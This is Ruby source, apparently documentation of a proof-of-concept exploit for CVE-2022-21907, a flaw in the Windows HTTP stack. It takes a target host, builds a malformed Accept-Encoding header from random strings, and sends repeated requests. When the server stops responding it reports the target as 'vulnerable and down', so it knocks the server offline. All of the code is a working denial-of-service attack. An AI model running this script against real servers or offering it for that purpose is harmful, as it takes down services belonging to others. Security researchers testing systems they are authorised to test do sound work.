class CVE202221907

# File CVE-2022-21907.rb, line 110
def self.check_up(request, uri)
  res = Net::HTTP.start(
    uri.hostname, uri.port,
    read_timeout: 60,
    open_timeout: 60,
    use_ssl: uri.scheme == 'https'
  ) { |http| http.request(request) }
rescue Net::OpenTimeout, Errno::ETIMEDOUT, SocketError
  puts '[!] This host is probably inaccessible'
  2
else
  nil
end

# File CVE-2022-21907.rb, line 98
def self.generate_encoding_payload
  "#{generate_random_string(24)},#{generate_random_string(60)}&" \
    "#{generate_random_string(2)}&**" \
    "#{generate_random_string(20)}**#{Array('A'..'Z').sample}," \
    "#{generate_random_string(73)},#{generate_random_string(71)}" \
    ",#{generate_random_string(27)},****************************" \
    "#{generate_random_string(6)}, *, ,"
end

# File CVE-2022-21907.rb, line 90
def self.generate_random_string(size)
  upper_characters = Array('A'..'Z')
  Array.new(size) { upper_characters.sample }.join
end

# File CVE-2022-21907.rb, line 82
def self.get_stdin_host
  print 'Host (target): '
  gets.strip
end

# File CVE-2022-21907.rb, line 127
def self.main
  host = ARGV[0] || get_stdin_host

  uri = URI("http://#{host}")
  request = Net::HTTP::Get.new(uri)

  access_error = check_up(request, uri)
  return access_error if access_error

  request['Accept-Encoding'] = generate_encoding_payload
  vulnerable = false

  10.times do
    Net::HTTP.start(
      uri.hostname, uri.port,
      read_timeout: 10,
      open_timeout: 10,
      use_ssl: uri.scheme == 'https'
    ) { |http| http.request(request) }
  rescue Net::OpenTimeout, Errno::ETIMEDOUT
    vulnerable = true
    break
  end

  if vulnerable
    puts "[+] Target: #{host} is vulnerable and down."
    0
  else
    puts "[-] Target: #{host} is not vulnerable and up."
    1
  end
end